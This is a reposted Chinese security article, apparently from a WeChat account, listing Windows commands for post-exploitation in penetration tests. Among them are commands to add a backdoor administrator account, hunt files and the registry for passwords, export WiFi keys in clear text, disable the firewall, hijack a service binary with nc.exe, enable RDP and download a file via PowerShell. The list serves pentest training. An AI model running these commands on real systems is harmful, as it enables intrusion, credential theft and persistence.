查看原文
其他

windows常用命令

2017-11-24 合天智汇

走过路过,不要错过这个公众号哦!

本文转自公众后:信安之路


在渗透测试中遇到 Windows 的概率是非常大的,那么在拿到一台服务器权限之后,通常会获得一个 shell,想要进行下一步渗透,几乎都是需要通过在 shell 中使用 Windows 的命令来进行渗透的,下面是一些常用的命令,虽然以前都发过了,但是很多人是不怎么反旧文的,所以每发出一次都会有人或多或少能学点东西,我就再发发,多看一遍多加深一点印象,凑合着看吧,最近实在是时间不多,压力大呀!

net 的常用用法

查看共享连接

net use

增加远程共享

net use \host /u:user pass

查看域中当前的主机列表

net view /domain

查看当前域中的用户

net user /domain

增加一个本地用户

net user user pass /add

将新增的用户加到本地管理员组

net localgroup "Administrators" user /add

查看域中的密码策略

net accounts /domain

查看本地组

net localgroup "Group"

查看域中的组信息

net group /domain

查看域中指定组的成员

net group "Domain group" /domain

查看当前机器所在的域名

net config workstation

查看当前服务器所在的域名

net config server

系统信息相关命令

显示系统信息

systeminfo

查看远程主机的系统信息

systeminfo /S ip /U domain\user /P Pwd

显示进程和服务信息

tasklist /svc

显示所有进程以及DLL信息

tasklist /m

显示进程和所有者

tasklist /v

查看远程主机的进程列表

tasklist /S ip /v

搜索所有 pdf 文件

dir /a /s /b c:\'.pdf'

显示服务信息

sc query

显示具体的服务信息(包括二进制路径和运行使用)

sc qc Spooler

找出文件名字包含 password 的文件

findstr /si 'password' .txt  

搜索敏感文件名称

dir /s *pass* == *cred* == *vnc* == *.config*

更改服务的二进制路径

sc config upnphost binpath= "C:\nc.exe"

修改系统服务的权限

sc config upnphost obj= ".\LocalSystem" password= ""

检查系统服务的权限

accesschk.exe -ucqv "Authenticated Users" * /accepteula

检查指定服务的权限

accesschk.exe -ucqv ServceName /accepteula

检查指定组在指定目录下的写权限

accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula

网络信息

打印路由表

route print

保存当前主机上的所有WiFi信息

netsh wlan export profile folder=. key=clear

设置当前配置禁用防火墙

netsh advfirewall set currentprofile state off

设置端口转发

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2

开启远程访问

启用远程访问

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

启用远程协助

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

修改远程访问端口

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f

注册表操作

查找注册表中的密码

reg query HKLM /f password /t REG_SZ /s

查询 winlogon 信息

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

使用 powershell

下载文件

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com/test.txt','C:\Users\admin\Desktop\test.test')"

列出运行的服务

Get-Service I where object {$ .status -eq ''Running''}

编译 C# 代码

1、切换到 .NET 目录

cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (或者 .NET 的对应版本的目录)

2、编译 x86 版本

csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x86 "/cs/files/dir/*.cs"

3、编译 x64 版本

csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x64 "/cs/files/dir/*.cs"

总结

命令列出来了,剩下的就靠大家在自己的电脑上测试吧,看看执行的结果,了解一下这些命令的作用,看如何在实际的渗透中应用。

别忘了投稿哟!!!

合天公众号开启原创投稿啦!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!

重金悬赏 | 合天原创投稿奖励来啦!

    合天智汇

网址 : www.heetian.com

电话:4006-123-731

长按图片,据说只有学霸能识别哦→

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存